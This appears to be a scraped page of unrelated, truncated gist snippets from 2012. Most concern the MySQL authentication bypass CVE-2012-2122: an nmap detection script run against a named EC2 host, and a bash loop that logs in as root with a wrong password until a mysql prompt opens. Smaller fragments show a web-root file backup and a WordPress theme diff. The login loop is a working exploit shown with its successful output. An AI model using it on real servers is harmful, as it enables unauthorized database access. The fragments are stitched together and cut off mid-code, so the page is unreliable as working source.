This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com | |
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST | |
--------------- Timing report --------------- | |
hostgroups: min 1, max 100000 | |
rtt-timeouts: init 1000, min 100, max 10000 | |
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 | |
parallelism: min 0, max 0 | |
max-retries: 10, host-timeout: 0 | |
min-rate: 0, max-rate: 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- Version 0.1 | |
-- Created 11/06/2012 - v0.1 - created by Marc Wickenden <marc@offensivecoder.com>, based on nse script by Patrik Karlsson |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
description = [[ | |
Checks for MySQL servers vulnerable to the authentication bypass CVE-2012-2122 | |
posted to http://seclists.org/oss-sec/2012/q2/493 | |
]] | |
--- | |
-- @output | |
-- 3306/tcp open mysql | |
-- | mysql-auth-bypass: | |
-- |_ user root is vulnerable to auth bypass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
socket:close() | |
end | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
return stdnse.format_output(true, result) | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@7E-Marc:~# for i in `seq 1 1000`; do mysql -u nse --password=bad -h ec2-46-137-134-79.eu-west-1.compute.amazonaws.com 2>/dev/null; done | |
Welcome to the MySQL monitor. Commands end with ; or \g. | |
Your MySQL connection id is 756 | |
Server version: 5.5.22-0ubuntu1-log (Ubuntu) | |
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. | |
mysql> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@7E-Marc:~# ls -l /usr/local/share/nmap/scripts/mysql-* | |
-rw-r--r-- 1 root root 6099 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-audit.nse | |
-rw-r--r-- 1 root root 2268 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-brute.nse | |
-rw-r--r-- 1 root root 2895 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-databases.nse | |
-rw-r--r-- 1 root root 1799 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-empty-password.nse | |
-rw-r--r-- 1 root root 4855 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-info.nse | |
-rw-r--r-- 1 root root 2687 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-users.nse | |
-rw-r--r-- 1 root root 3100 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-variables.nse |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com | |
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST | |
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79) | |
Host is up (0.050s latency). | |
PORT STATE SERVICE | |
3306/tcp open mysql | |
| mysql-auth-bypass: | |
|_ user nse is vulnerable to auth bypass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@debian1:/var/www/0day# ls -l | |
total 4 | |
-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php | |
root@debian1:/var/www/0day# curl http://localhost/0day/test.php | |
nothing to see here | |
root@debian1:/var/www/0day# cp test.php{,~} | |
root@debian1:/var/www/0day# ls -l | |
total 8 | |
-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php | |
-rw-r--r-- 1 root root 41 Jun 15 11:26 test.php~ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
diff -ruw responsive.1.6.2/footer.php responsive.1.6.2-vimeo/footer.php | |
--- responsive.1.6.2/footer.php 2012-06-19 09:35:37.495143600 +0100 | |
+++ responsive.1.6.2-vimeo/footer.php 2012-06-19 09:25:42.000000000 +0100 | |
@@ -64,6 +64,10 @@ | |
.'<img src="' . get_stylesheet_directory_uri() . '/icons/youtube-icon.png" width="24" height="24" alt="YouTube">' | |
.'</a></li>'; | |
+ if (!empty($options['vimeo_uid'])) echo '<li class="vimeo-icon"><a href="' . $options['vimeo_uid'] . '">' | |
+ .'<img src="' . get_stylesheet_directory_uri() . '/icons/vimeo-icon.png" width="24" height="24" alt="Vimeo">' | |
+ .'</a></li>'; |